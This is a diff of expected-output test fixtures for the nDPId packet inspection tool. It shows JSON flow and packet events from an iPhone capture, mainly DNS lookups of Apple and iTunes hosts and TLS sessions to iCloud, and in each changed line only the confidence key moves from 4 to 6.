00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABCtyIAAP8RfyXAqAIRwKgCAfeRADUALilRj7EBAAABAAAAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAE="} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABD8ooAAP8RQ7zAqAIRwKgCAdAYADUALxueCAsBAAABAAAAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABCQ9gAAP8R8m\/AqAIRwKgCAdLfADUALndaZloBAAABAAAAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAE="} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABD04UAAP8RYsHAqAIRwKgCAcLYADUAL8OecEkBAAABAAAAAAAABGluaXQGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598721,"flow_last_seen":1582454598721,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598721,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454598721,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598721,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrK\/AqAIREfi5V8WVAbuoGt7oAAAAALDC\/\/9fVwAAAgQFtAEDAwcBAQgKEd\/opwAAAAAEAgAA"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1582454598723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598723,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WUAbuGKOrEAHfVYYAQBAuCrAAAAQEIChHf6IhbEwd4"} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598587,"flow_last_seen":1582454598723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598723,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598587,"flow_last_seen":1582454598723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598723,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1582454598755,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1582454598755,"pkt":"xGGLNYKpxiwDYGpkCABFAAC9YWUAAEARk2jAqAIBwKgCEQA1zcoAqUkOwemBgAABAAQAAAAAA3d3dwZpY2xvdWQDY29tAAABAAHADAAFAAEAAAfiAB8Hd3d3LWNkbgZpY2xvdWQDY29tBmFrYWRucwNuZXQAwCwABQABAAAAjwAZA3d3dwZpY2xvdWQDY29tB2VkZ2VrZXnARsBXAAUAAQAAEZYAFQVlNDQ3OAFhCmFrYW1haWVkZ2XARsB8AAEAAQAAABgABBctSi4="} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454598755,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.45.74.46"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454598755,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.45.74.46"}} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454598756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1582454598756,"pkt":"xGGLNYKpxiwDYGpkCABFAADSfP0AAEARd7vAqAIBwKgCEQA10EUAvrFqiY6BgAABAAQAAAAACWlwaG9uZS1sZAVhcHBsZQNjb20AAAEAAcAMAAUAAQAACaQAJwlpcGhvbmUtbGQMb3JpZ2luLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAxAAUAAQAAAMcAIQxpcGhvbmUtbGQtYXIFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAFQVlOTMzOAFkCmFrYW1haWVkZ2XAU8CRAAEAAQAAAA8ABFx6\/FI="} -00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":173,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454598756,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"iphone-ld.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.252.82"}} +00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":173,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454598756,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"iphone-ld.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.252.82"}} 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1582454598756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1582454598756,"pkt":"xGGLNYKpxiwDYGpkCABFAAB5PvQAAEARth3AqAIBwKgCEQA1+ssAZUgsu2OBgAABAAAAAQAACmJhc2VqdW1wZXIFYXBwbGUDY29tAAABAAHAFwAGAAEAAADfACsHbnNlcnZlcsAXCmhvc3RtYXN0ZXLAF3fP6nAAAAOEAAADhAAewwAAADhA"} -00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1582454598756,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"basejumper.apple.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1582454598756,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"basejumper.apple.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1582454598758,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454598758,"pkt":"xGGLNYKpxiwDYGpkCABFAADPyEMAAEARLHjAqAIBwKgCEQA195EAu7eFj7GBgAABAAQAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACYIaW5pdC1jZG4MaXR1bmVzLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAyAAUAAQAAC+cAGwZpdHVuZXMFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAGARlNjczBWRzY2U5CmFrYW1haWVkZ2XAU8CLAAEAAQAAABcABF9lGDU="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1582454598758,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454598758,"pkt":"xGGLNYKpxiwDYGpkCABFAADPdQkAAEARf7LAqAIBwKgCEQA10t8AuwWPZlqBgAABAAQAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACYIaW5pdC1jZG4MaXR1bmVzLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAyAAUAAQAAC+cAGwZpdHVuZXMFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAGARlNjczBWRzY2U5CmFrYW1haWVkZ2XAU8CLAAEAAQAAABcABF9lGDU="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} -00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598587,"flow_last_seen":1582454598759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 